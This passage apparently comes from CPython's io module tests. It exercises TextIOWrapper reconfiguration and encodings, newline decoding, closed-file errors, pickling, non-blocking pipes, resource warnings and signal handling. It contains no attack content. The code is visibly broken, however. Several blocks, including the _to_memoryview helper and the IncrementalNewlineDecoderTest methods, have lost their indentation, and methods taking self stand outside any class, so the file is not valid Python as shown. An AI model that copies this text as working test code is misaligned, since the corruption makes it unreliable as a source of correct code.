    self.assertEqual(b''.join(raw._write_stack), b'1')
    t.write('23')
    self.assertEqual(b''.join(raw._write_stack), b'123')
    t.reconfigure(write_through=False)
    self.assertEqual(t.write_through, False)
    t.write('45')
    t.flush()
    self.assertEqual(b''.join(raw._write_stack), b'12345')
    # Keeping default value
    t.reconfigure()
    t.reconfigure(write_through=None)
    self.assertEqual(t.write_through, False)
    t.reconfigure(write_through=True)
    t.reconfigure()
    t.reconfigure(write_through=None)
    self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
    # Issue #17106
    # Crash when underlying read() returns non-bytes
    t = self.TextIOWrapper(self.StringIO('a'))
    self.assertRaises(TypeError, t.read, 1)
    t = self.TextIOWrapper(self.StringIO('a'))
    self.assertRaises(TypeError, t.readline)
    t = self.TextIOWrapper(self.StringIO('a'))
    self.assertRaises(TypeError, t.read)
def test_illegal_encoder(self):
    # Issue 31271: Calling write() while the return value of encoder's
    # encode() is invalid shouldn't cause an assertion failure.
    rot13 = codecs.lookup("rot13")
    # Temporarily pretend rot13 is a text encoding to get past the
    # early validity check.
    with support.swap_attr(rot13, '_is_text_encoding', True):
        t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
    self.assertRaises(TypeError, t.write, 'bar')
def test_illegal_decoder(self):
    # Issue #17106
    # Bypass the early encoding check added in issue 20404
    def _make_illegal_wrapper():
        # quopri decodes bytes->bytes, so using it as a text codec makes
        # the decoder return non-str.
        quopri = codecs.lookup("quopri")
        quopri._is_text_encoding = True
        try:
            t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
                                   newline='\n', encoding="quopri")
        finally:
            quopri._is_text_encoding = False
        return t
    # Crash when decoder returns non-string
    t = _make_illegal_wrapper()
    self.assertRaises(TypeError, t.read, 1)
    t = _make_illegal_wrapper()
    self.assertRaises(TypeError, t.readline)
    t = _make_illegal_wrapper()
    self.assertRaises(TypeError, t.read)
    # Issue 31243: calling read() while the return value of decoder's
    # getstate() is invalid should neither crash the interpreter nor
    # raise a SystemError.
    def _make_very_illegal_wrapper(getstate_ret_val):
        class BadDecoder:
            def getstate(self):
                return getstate_ret_val
        def _get_bad_decoder(dummy):
            return BadDecoder()
        quopri = codecs.lookup("quopri")
        with support.swap_attr(quopri, 'incrementaldecoder',
                               _get_bad_decoder):
            return _make_illegal_wrapper()
    t = _make_very_illegal_wrapper(42)
    self.assertRaises(TypeError, t.read, 42)
    t = _make_very_illegal_wrapper(())
    self.assertRaises(TypeError, t.read, 42)
    t = _make_very_illegal_wrapper((1, 2))
    self.assertRaises(TypeError, t.read, 42)
def _check_create_at_shutdown(self, **kwargs):
    # Issue #20037: creating a TextIOWrapper at shutdown
    # shouldn't crash the interpreter.
    # Run a subprocess whose __del__ constructs a TextIOWrapper during
    # interpreter shutdown; returns the assert_python_ok() result.
    iomod = self.io.__name__
    code = """if 1:
        import codecs
        import {iomod} as io

        # Avoid looking up codecs at shutdown

        codecs.lookup('utf-8')

        class C:
            def __init__(self):
                self.buf = io.BytesIO()
            def __del__(self):
                io.TextIOWrapper(self.buf, **{kwargs})
                print("ok")
        c = C()
        """.format(iomod=iomod, kwargs=kwargs)
    return assert_python_ok("-c", code)
def test_create_at_shutdown_without_encoding(self):
    """Creating a TextIOWrapper at shutdown without encoding either
    succeeds or fails with the known module-state error — never crashes."""
    rc, out, err = self._check_create_at_shutdown()
    if err:
        # Can error out with a RuntimeError if the module state
        # isn't found.
        self.assertIn(self.shutdown_error, err.decode())
    else:
        self.assertEqual("ok", out.decode().strip())
def test_create_at_shutdown_with_encoding(self):
    """With an explicit encoding, shutdown creation must fully succeed."""
    rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
                                                  errors='strict')
    self.assertFalse(err)
    self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
    """TextIOWrapper must accept buffers whose read() returns a
    memoryview rather than bytes."""
    r = MemviewBytesIO(b'Just some random string\n')
    t = self.TextIOWrapper(r, 'utf-8')
    # TextIOwrapper will not read the full string, because
    # we truncate it to a multiple of the native int size
    # so that we can construct a more complex memoryview.
    bytes_val = _to_memoryview(r.getvalue()).tobytes()
    self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
    """Issue 22849: repeated failed construction (object lacking tell())
    must not corrupt state; construction succeeds once tell() exists."""
    class F(object):
        def readable(self): return True
        def writable(self): return True
        def seekable(self): return True

    for i in range(10):
        try:
            self.TextIOWrapper(F(), encoding='utf-8')
        except Exception:
            pass

    F.tell = lambda x: 0
    t = self.TextIOWrapper(F(), encoding='utf-8')
def test_reconfigure_encoding_read(self):
    # latin1 -> utf8
    # (latin1 can decode utf-8 encoded string)
    data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8')
    raw = self.BytesIO(data)
    txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
    self.assertEqual(txt.readline(), 'abc\xe9\n')
    # Changing encoding or newline after reading has started is rejected.
    with self.assertRaises(self.UnsupportedOperation):
        txt.reconfigure(encoding='utf-8')
    with self.assertRaises(self.UnsupportedOperation):
        txt.reconfigure(newline=None)
def test_reconfigure_write_fromascii(self):
    # ascii has a specific encodefunc in the C implementation,
    # but utf-8-sig has not. Make sure that we get rid of the
    # cached encodefunc when we switch encoders.
    raw = self.BytesIO()
    txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
    txt.write('foo\n')
    txt.reconfigure(encoding='utf-8-sig')
    txt.write('\xe9\n')
    txt.flush()
    # No BOM mid-file; '\xe9' encoded by the new (utf-8) encoder.
    self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')
def test_reconfigure_write(self):
    """reconfigure(encoding=...) mid-write flushes old-encoder output and
    encodes subsequent writes with the new codec, without a mid-file BOM."""
    # latin -> utf8
    raw = self.BytesIO()
    txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
    txt.write('abc\xe9\n')
    txt.reconfigure(encoding='utf-8')
    # Implied flush: latin1 bytes already in the raw stream.
    self.assertEqual(raw.getvalue(), b'abc\xe9\n')
    txt.write('d\xe9f\n')
    txt.flush()
    self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')

    # ascii -> utf-8-sig: ensure that no BOM is written in the middle of
    # the file
    raw = self.BytesIO()
    txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
    txt.write('abc\n')
    txt.reconfigure(encoding='utf-8-sig')
    txt.write('d\xe9f\n')
    txt.flush()
    self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')
def test_reconfigure_write_non_seekable(self):
    """On a non-seekable stream the wrapper can't check the position, so
    switching to utf-8-sig does emit a mid-stream BOM."""
    raw = self.BytesIO()
    raw.seekable = lambda: False
    raw.seek = None
    txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
    txt.write('abc\n')
    txt.reconfigure(encoding='utf-8-sig')
    txt.write('d\xe9f\n')
    txt.flush()

    # If the raw stream is not seekable, there'll be a BOM
    self.assertEqual(raw.getvalue(),  b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')
def test_reconfigure_defaults(self):
    """reconfigure() keeps unspecified settings, except that changing the
    encoding resets errors to 'strict' when errors isn't given."""
    txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
    txt.reconfigure(encoding=None)
    self.assertEqual(txt.encoding, 'ascii')
    self.assertEqual(txt.errors, 'replace')
    txt.write('LF\n')

    txt.reconfigure(newline='\r\n')
    self.assertEqual(txt.encoding, 'ascii')
    self.assertEqual(txt.errors, 'replace')

    txt.reconfigure(errors='ignore')
    self.assertEqual(txt.encoding, 'ascii')
    self.assertEqual(txt.errors, 'ignore')
    txt.write('CRLF\n')

    txt.reconfigure(encoding='utf-8', newline=None)
    # New encoding without errors= resets errors to strict.
    self.assertEqual(txt.errors, 'strict')
    txt.seek(0)
    self.assertEqual(txt.read(), 'LF\nCRLF\n')

    self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')
def test_reconfigure_newline(self):
    """reconfigure(newline=...) takes effect for subsequent reads and
    writes: each mode's translation is checked in both directions."""
    raw = self.BytesIO(b'CR\rEOF')
    txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
    txt.reconfigure(newline=None)
    self.assertEqual(txt.readline(), 'CR\n')
    raw = self.BytesIO(b'CR\rEOF')
    txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
    txt.reconfigure(newline='')
    self.assertEqual(txt.readline(), 'CR\r')
    raw = self.BytesIO(b'CR\rLF\nEOF')
    txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
    txt.reconfigure(newline='\n')
    self.assertEqual(txt.readline(), 'CR\rLF\n')
    raw = self.BytesIO(b'LF\nCR\rEOF')
    txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
    txt.reconfigure(newline='\r')
    self.assertEqual(txt.readline(), 'LF\nCR\r')
    raw = self.BytesIO(b'CR\rCRLF\r\nEOF')
    txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
    txt.reconfigure(newline='\r\n')
    self.assertEqual(txt.readline(), 'CR\rCRLF\r\n')

    # Write side: switch modes between writes and check the raw bytes.
    txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r')
    txt.reconfigure(newline=None)
    txt.write('linesep\n')
    txt.reconfigure(newline='')
    txt.write('LF\n')
    txt.reconfigure(newline='\n')
    txt.write('LF\n')
    txt.reconfigure(newline='\r')
    txt.write('CR\n')
    txt.reconfigure(newline='\r\n')
    txt.write('CRLF\n')
    expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n'
    self.assertEqual(txt.detach().getvalue().decode('ascii'), expected)
def test_issue25862(self):
    # Assertion failures occurred in tell() after read() and write().
    t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
    t.read(1)
    t.read()
    t.tell()
    t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
    t.read(1)
    t.write('x')
    t.tell()
class MemviewBytesIO(io.BytesIO):
    '''A BytesIO object whose read method returns memoryviews
    rather than bytes'''

    def read1(self, len_):
        # Delegate, then wrap the result in a non-trivial memoryview.
        return _to_memoryview(super().read1(len_))

    def read(self, len_):
        return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
    """Run TextIOWrapperTest against the C implementation (io)."""
    io = io
    # Error text expected when creating a wrapper at interpreter shutdown.
    shutdown_error = "RuntimeError: could not find io module state"

    def test_initialization(self):
        """Re-__init__ with a bad newline leaves the object unusable,
        and repr() of an uninitialized wrapper raises instead of crashing."""
        r = self.BytesIO(b"\xc3\xa9\n\n")
        b = self.BufferedReader(r, 1000)
        t = self.TextIOWrapper(b)
        self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
        self.assertRaises(ValueError, t.read)

        t = self.TextIOWrapper.__new__(self.TextIOWrapper)
        self.assertRaises(Exception, repr, t)

    def test_garbage_collection(self):
        # C TextIOWrapper objects are collected, and collecting them flushes
        # all data to disk.
        # The Python version has __del__, so it ends in gc.garbage instead.
        with support.check_warnings(('', ResourceWarning)):
            rawio = io.FileIO(support.TESTFN, "wb")
            b = self.BufferedWriter(rawio)
            t = self.TextIOWrapper(b, encoding="ascii")
            t.write("456def")
            t.x = t   # create a reference cycle to force GC collection
            wr = weakref.ref(t)
            del t
            support.gc_collect()
        self.assertIsNone(wr(), wr)
        with self.open(support.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"456def")

    def test_rwpair_cleared_before_textio(self):
        # Issue 13070: TextIOWrapper's finalization would crash when called
        # after the reference to the underlying BufferedRWPair's writer got
        # cleared by the GC.
        for i in range(1000):
            b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
            t1 = self.TextIOWrapper(b1, encoding="ascii")
            b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
            t2 = self.TextIOWrapper(b2, encoding="ascii")
            # circular references
            t1.buddy = t2
            t2.buddy = t1
        support.gc_collect()

    def test_del__CHUNK_SIZE_SystemError(self):
        # Deleting _CHUNK_SIZE must raise AttributeError, not SystemError.
        t = self.TextIOWrapper(self.BytesIO(), encoding='ascii')
        with self.assertRaises(AttributeError):
            del t._CHUNK_SIZE
class PyTextIOWrapperTest(TextIOWrapperTest):
    """Run TextIOWrapperTest against the pure-Python implementation (_pyio)."""
    io = pyio
    # The Python implementation fails shutdown creation differently.
    shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
    """Exercise newline decoding over several byte encodings and raw str."""
    encodings = (
        # None means the IncrementalNewlineDecoder consumes str input
        # rather than bytes input.
        None, 'utf-8', 'latin-1',
        'utf-16', 'utf-16-le', 'utf-16-be',
        'utf-32', 'utf-32-le', 'utf-32-be',
    )
    for enc in encodings:
        inner = codecs.getincrementaldecoder(enc)() if enc else None
        wrapped = self.IncrementalNewlineDecoder(inner, translate=True)
        self.check_newline_decoding(wrapped, enc)
    # UTF-8-specific checks, plus setstate() argument validation.
    utf8_decoder = self.IncrementalNewlineDecoder(
        codecs.getincrementaldecoder("utf-8")(), translate=True)
    self.check_newline_decoding_utf8(utf8_decoder)
    self.assertRaises(TypeError, utf8_decoder.setstate, 42)
def test_newline_bytes(self):
    """Issue 5433: code points whose low byte looks like CR/LF must pass
    through untouched and must not register as newlines."""
    def _assert_passthrough(dec):
        self.assertEqual(dec.newlines, None)
        self.assertEqual(dec.decode("\u0D00"), "\u0D00")
        self.assertEqual(dec.newlines, None)
        self.assertEqual(dec.decode("\u0A00"), "\u0A00")
        self.assertEqual(dec.newlines, None)
    for translate in (False, True):
        _assert_passthrough(self.IncrementalNewlineDecoder(None, translate=translate))
def test_translate(self):
    """Issue 35062: any truthy ``translate`` value must enable newline
    translation; a falsy one must leave '\\r' / '\\r\\n' untouched."""
    for translate in (-2, -1, 1, 2):
        dec = self.IncrementalNewlineDecoder(
            codecs.getincrementaldecoder("utf-8")(), translate)
        self.check_newline_decoding_utf8(dec)
    untranslated = self.IncrementalNewlineDecoder(
        codecs.getincrementaldecoder("utf-8")(), translate=0)
    self.assertEqual(untranslated.decode(b"\r\r\n"), "\r\r\n")
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
    # Runs the shared newline-decoder tests against the C implementation;
    # the concrete namespace is injected by load_tests().
    pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
    # Same tests against the pure-Python (_pyio) implementation;
    # the concrete namespace is injected by load_tests().
    pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
    """Assorted tests of module-level io behaviour: __all__, open() modes,
    operations on closed files, pickling, non-blocking pipes, dealloc
    warnings, and encoding/errors validation.

    The concrete io namespace under test (C or pure Python) is injected
    into the class by load_tests().
    """

    def tearDown(self):
        support.unlink(support.TESTFN)

    def test___all__(self):
        # Every exported name must resolve and be an exception, a SEEK_*
        # constant, or an IOBase subclass (open/open_code excepted).
        for name in self.io.__all__:
            obj = getattr(self.io, name, None)
            self.assertIsNotNone(obj, name)
            if name in ("open", "open_code"):
                continue
            elif "error" in name.lower() or name == "UnsupportedOperation":
                self.assertTrue(issubclass(obj, Exception), name)
            elif not name.startswith("SEEK_"):
                self.assertTrue(issubclass(obj, self.IOBase))

    def test_attributes(self):
        f = self.open(support.TESTFN, "wb", buffering=0)
        self.assertEqual(f.mode, "wb")
        f.close()

        f = self.open(support.TESTFN, "w+")
        self.assertEqual(f.mode, "w+")
        self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
        self.assertEqual(f.buffer.raw.mode, "rb+")

        # Wrapping an existing fd: mode/name propagate to the raw layer.
        g = self.open(f.fileno(), "wb", closefd=False)
        self.assertEqual(g.mode, "wb")
        self.assertEqual(g.raw.mode, "wb")
        self.assertEqual(g.name, f.fileno())
        self.assertEqual(g.raw.name, f.fileno())
        f.close()
        g.close()

    def test_removed_u_mode(self):
        # "U" mode has been removed in Python 3.9
        for mode in ("U", "rU", "r+U"):
            with self.assertRaises(ValueError) as cm:
                self.open(support.TESTFN, mode)
            self.assertIn('invalid mode', str(cm.exception))

    def test_open_pipe_with_append(self):
        # bpo-27805: Ignore ESPIPE from lseek() in open().
        r, w = os.pipe()
        self.addCleanup(os.close, r)
        f = self.open(w, 'a')
        self.addCleanup(f.close)
        # Check that the file is marked non-seekable. On Windows, however, lseek
        # somehow succeeds on pipes.
        if sys.platform != 'win32':
            self.assertFalse(f.seekable())

    def test_io_after_close(self):
        # Every operation on a closed file must raise ValueError, for every
        # mode/buffering combination that produces a distinct file type.
        for kwargs in [
                {"mode": "w"},
                {"mode": "wb"},
                {"mode": "w", "buffering": 1},
                {"mode": "w", "buffering": 2},
                {"mode": "wb", "buffering": 0},
                {"mode": "r"},
                {"mode": "rb"},
                {"mode": "r", "buffering": 1},
                {"mode": "r", "buffering": 2},
                {"mode": "rb", "buffering": 0},
                {"mode": "w+"},
                {"mode": "w+b"},
                {"mode": "w+", "buffering": 1},
                {"mode": "w+", "buffering": 2},
                {"mode": "w+b", "buffering": 0},
            ]:
            f = self.open(support.TESTFN, **kwargs)
            f.close()
            self.assertRaises(ValueError, f.flush)
            self.assertRaises(ValueError, f.fileno)
            self.assertRaises(ValueError, f.isatty)
            self.assertRaises(ValueError, f.__iter__)
            if hasattr(f, "peek"):
                self.assertRaises(ValueError, f.peek, 1)
            self.assertRaises(ValueError, f.read)
            if hasattr(f, "read1"):
                self.assertRaises(ValueError, f.read1, 1024)
                self.assertRaises(ValueError, f.read1)
            if hasattr(f, "readall"):
                self.assertRaises(ValueError, f.readall)
            if hasattr(f, "readinto"):
                self.assertRaises(ValueError, f.readinto, bytearray(1024))
            if hasattr(f, "readinto1"):
                self.assertRaises(ValueError, f.readinto1, bytearray(1024))
            self.assertRaises(ValueError, f.readline)
            self.assertRaises(ValueError, f.readlines)
            self.assertRaises(ValueError, f.readlines, 1)
            self.assertRaises(ValueError, f.seek, 0)
            self.assertRaises(ValueError, f.tell)
            self.assertRaises(ValueError, f.truncate)
            self.assertRaises(ValueError, f.write,
                              b"" if "b" in kwargs['mode'] else "")
            self.assertRaises(ValueError, f.writelines, [])
            self.assertRaises(ValueError, next, f)

    def test_blockingioerror(self):
        # Various BlockingIOError issues
        # Build a reference cycle through the exception and check that the
        # cycle is collectable (the weakref must die after gc).
        class C(str):
            pass
        c = C("")
        b = self.BlockingIOError(1, c)
        c.b = b
        b.c = c
        wr = weakref.ref(c)
        del c, b
        support.gc_collect()
        self.assertIsNone(wr(), wr)

    def test_abcs(self):
        # Test the visible base classes are ABCs.
        self.assertIsInstance(self.IOBase, abc.ABCMeta)
        self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
        self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
        self.assertIsInstance(self.TextIOBase, abc.ABCMeta)

    def _check_abc_inheritance(self, abcmodule):
        # Each concrete stream type must register against exactly one of the
        # raw/buffered/text ABCs from *abcmodule* (plus IOBase).
        with self.open(support.TESTFN, "wb", buffering=0) as f:
            self.assertIsInstance(f, abcmodule.IOBase)
            self.assertIsInstance(f, abcmodule.RawIOBase)
            self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
            self.assertNotIsInstance(f, abcmodule.TextIOBase)
        with self.open(support.TESTFN, "wb") as f:
            self.assertIsInstance(f, abcmodule.IOBase)
            self.assertNotIsInstance(f, abcmodule.RawIOBase)
            self.assertIsInstance(f, abcmodule.BufferedIOBase)
            self.assertNotIsInstance(f, abcmodule.TextIOBase)
        with self.open(support.TESTFN, "w") as f:
            self.assertIsInstance(f, abcmodule.IOBase)
            self.assertNotIsInstance(f, abcmodule.RawIOBase)
            self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
            self.assertIsInstance(f, abcmodule.TextIOBase)

    def test_abc_inheritance(self):
        # Test implementations inherit from their respective ABCs
        self._check_abc_inheritance(self)

    def test_abc_inheritance_official(self):
        # Test implementations inherit from the official ABCs of the
        # baseline "io" module.
        self._check_abc_inheritance(io)

    def _check_warn_on_dealloc(self, *args, **kwargs):
        # Deallocating an unclosed file must emit a ResourceWarning that
        # mentions the file's repr.
        f = open(*args, **kwargs)
        r = repr(f)
        with self.assertWarns(ResourceWarning) as cm:
            f = None
            support.gc_collect()
        self.assertIn(r, str(cm.warning.args[0]))

    def test_warn_on_dealloc(self):
        self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
        self._check_warn_on_dealloc(support.TESTFN, "wb")
        self._check_warn_on_dealloc(support.TESTFN, "w")

    def _check_warn_on_dealloc_fd(self, *args, **kwargs):
        fds = []
        def cleanup_fds():
            for fd in fds:
                try:
                    os.close(fd)
                except OSError as e:
                    if e.errno != errno.EBADF:
                        raise
        self.addCleanup(cleanup_fds)
        r, w = os.pipe()
        fds += r, w
        self._check_warn_on_dealloc(r, *args, **kwargs)
        # When using closefd=False, there's no warning
        r, w = os.pipe()
        fds += r, w
        with support.check_no_resource_warning(self):
            open(r, *args, closefd=False, **kwargs)

    def test_warn_on_dealloc_fd(self):
        self._check_warn_on_dealloc_fd("rb", buffering=0)
        self._check_warn_on_dealloc_fd("rb")
        self._check_warn_on_dealloc_fd("r")

    def test_pickling(self):
        # Pickling file objects is forbidden
        for kwargs in [
                {"mode": "w"},
                {"mode": "wb"},
                {"mode": "wb", "buffering": 0},
                {"mode": "r"},
                {"mode": "rb"},
                {"mode": "rb", "buffering": 0},
                {"mode": "w+"},
                {"mode": "w+b"},
                {"mode": "w+b", "buffering": 0},
            ]:
            for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
                with self.open(support.TESTFN, **kwargs) as f:
                    self.assertRaises(TypeError, pickle.dumps, f, protocol)

    def test_nonblock_pipe_write_bigbuf(self):
        self._test_nonblock_pipe_write(16*1024)

    def test_nonblock_pipe_write_smallbuf(self):
        self._test_nonblock_pipe_write(1024)

    @unittest.skipUnless(hasattr(os, 'set_blocking'),
                         'os.set_blocking() required for this test')
    def _test_nonblock_pipe_write(self, bufsize):
        sent = []
        received = []
        r, w = os.pipe()
        os.set_blocking(r, False)
        os.set_blocking(w, False)

        # To exercise all code paths in the C implementation we need
        # to play with buffer sizes. For instance, if we choose a
        # buffer size less than or equal to _PIPE_BUF (4096 on Linux)
        # then we will never get a partial write of the buffer.
        rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
        wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)

        with rf, wf:
            # Fill the pipe until the write side blocks, truncating the last
            # (partial) message to what was actually written.
            for N in 9999, 73, 7574:
                try:
                    i = 0
                    while True:
                        msg = bytes([i % 26 + 97]) * N
                        sent.append(msg)
                        wf.write(msg)
                        i += 1
                except self.BlockingIOError as e:
                    self.assertEqual(e.args[0], errno.EAGAIN)
                    self.assertEqual(e.args[2], e.characters_written)
                    sent[-1] = sent[-1][:e.characters_written]
                    received.append(rf.read())
                    msg = b'BLOCKED'
                    wf.write(msg)
                    sent.append(msg)
            # Drain-and-retry until the buffered data can be fully flushed.
            while True:
                try:
                    wf.flush()
                    break
                except self.BlockingIOError as e:
                    self.assertEqual(e.args[0], errno.EAGAIN)
                    self.assertEqual(e.args[2], e.characters_written)
                    self.assertEqual(e.characters_written, 0)
                    received.append(rf.read())
            received += iter(rf.read, None)

        sent, received = b''.join(sent), b''.join(received)
        self.assertEqual(sent, received)
        self.assertTrue(wf.closed)
        self.assertTrue(rf.closed)

    def test_create_fail(self):
        # 'x' mode fails if file is existing
        with self.open(support.TESTFN, 'w'):
            pass
        self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')

    def test_create_writes(self):
        # 'x' mode opens for writing
        with self.open(support.TESTFN, 'xb') as f:
            f.write(b"spam")
        with self.open(support.TESTFN, 'rb') as f:
            self.assertEqual(b"spam", f.read())

    def test_open_allargs(self):
        # there used to be a buffer overflow in the parser for rawmode
        self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')

    def test_check_encoding_errors(self):
        # bpo-37388: open() and TextIOWrapper must check encoding and errors
        # arguments in dev mode
        mod = self.io.__name__
        filename = __file__
        invalid = 'Boom, Shaka Laka, Boom!'
        # The child process exits with a distinct code per failing case;
        # exit code 10 means every bad argument raised LookupError.
        code = textwrap.dedent(f'''
            import sys
            from {mod} import open, TextIOWrapper
            try:
                open({filename!r}, encoding={invalid!r})
            except LookupError:
                pass
            else:
                sys.exit(21)
            try:
                open({filename!r}, errors={invalid!r})
            except LookupError:
                pass
            else:
                sys.exit(22)
            fp = open({filename!r}, "rb")
            with fp:
                try:
                    TextIOWrapper(fp, encoding={invalid!r})
                except LookupError:
                    pass
                else:
                    sys.exit(23)
                try:
                    TextIOWrapper(fp, errors={invalid!r})
                except LookupError:
                    pass
                else:
                    sys.exit(24)
            sys.exit(10)
        ''')
        proc = assert_python_failure('-X', 'dev', '-c', code)
        self.assertEqual(proc.rc, 10, proc)
class CMiscIOTest(MiscIOTest):
    # Runs MiscIOTest against the C implementation of io, plus some
    # C-implementation-only regression tests.
    io = io

    def test_readinto_buffer_overflow(self):
        # Issue #18025
        # A read() that returns more bytes than the target buffer can hold
        # must raise ValueError instead of overflowing.
        class BadReader(self.io.BufferedIOBase):
            def read(self, n=-1):
                return b'x' * 10**6
        bufio = BadReader()
        b = bytearray(2)
        self.assertRaises(ValueError, bufio.readinto, b)

    def check_daemon_threads_shutdown_deadlock(self, stream_name):
        # Issue #23309: deadlocks at shutdown should be avoided when a
        # daemon thread and the main thread both write to a file.
        code = """if 1:
            import sys
            import time
            import threading
            from test.support import SuppressCrashReport
            file = sys.{stream_name}
            def run():
                while True:
                    file.write('.')
                    file.flush()
            crash = SuppressCrashReport()
            crash.__enter__()
            # don't call __exit__(): the crash occurs at Python shutdown
            thread = threading.Thread(target=run)
            thread.daemon = True
            thread.start()
            time.sleep(0.5)
            file.write('!')
            file.flush()
            """.format_map(locals())
        res, _ = run_python_until_end("-c", code)
        err = res.err.decode()
        if res.rc != 0:
            # Failure: should be a fatal error
            pattern = (r"Fatal Python error: could not acquire lock "
                       r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> "
                       r"at interpreter shutdown, possibly due to "
                       r"daemon threads".format_map(locals()))
            self.assertRegex(err, pattern)
        else:
            self.assertFalse(err.strip('.!'))

    def test_daemon_threads_shutdown_stdout_deadlock(self):
        self.check_daemon_threads_shutdown_deadlock('stdout')

    def test_daemon_threads_shutdown_stderr_deadlock(self):
        self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
    # Runs MiscIOTest against the pure-Python (_pyio) implementation.
    io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
    """Interaction of blocking buffered I/O with POSIX signal handlers:
    interruption, EINTR retry, and reentrancy detection."""

    def setUp(self):
        self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)

    def tearDown(self):
        signal.signal(signal.SIGALRM, self.oldalrm)

    def alarm_interrupt(self, sig, frame):
        # Deliberately raise ZeroDivisionError from inside the handler.
        1/0

    def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
        """Check that a partial write, when it gets interrupted, properly
        invokes the signal handler, and bubbles up the exception raised
        in the latter."""
        read_results = []
        def _read():
            s = os.read(r, 1)
            read_results.append(s)

        t = threading.Thread(target=_read)
        t.daemon = True
        r, w = os.pipe()
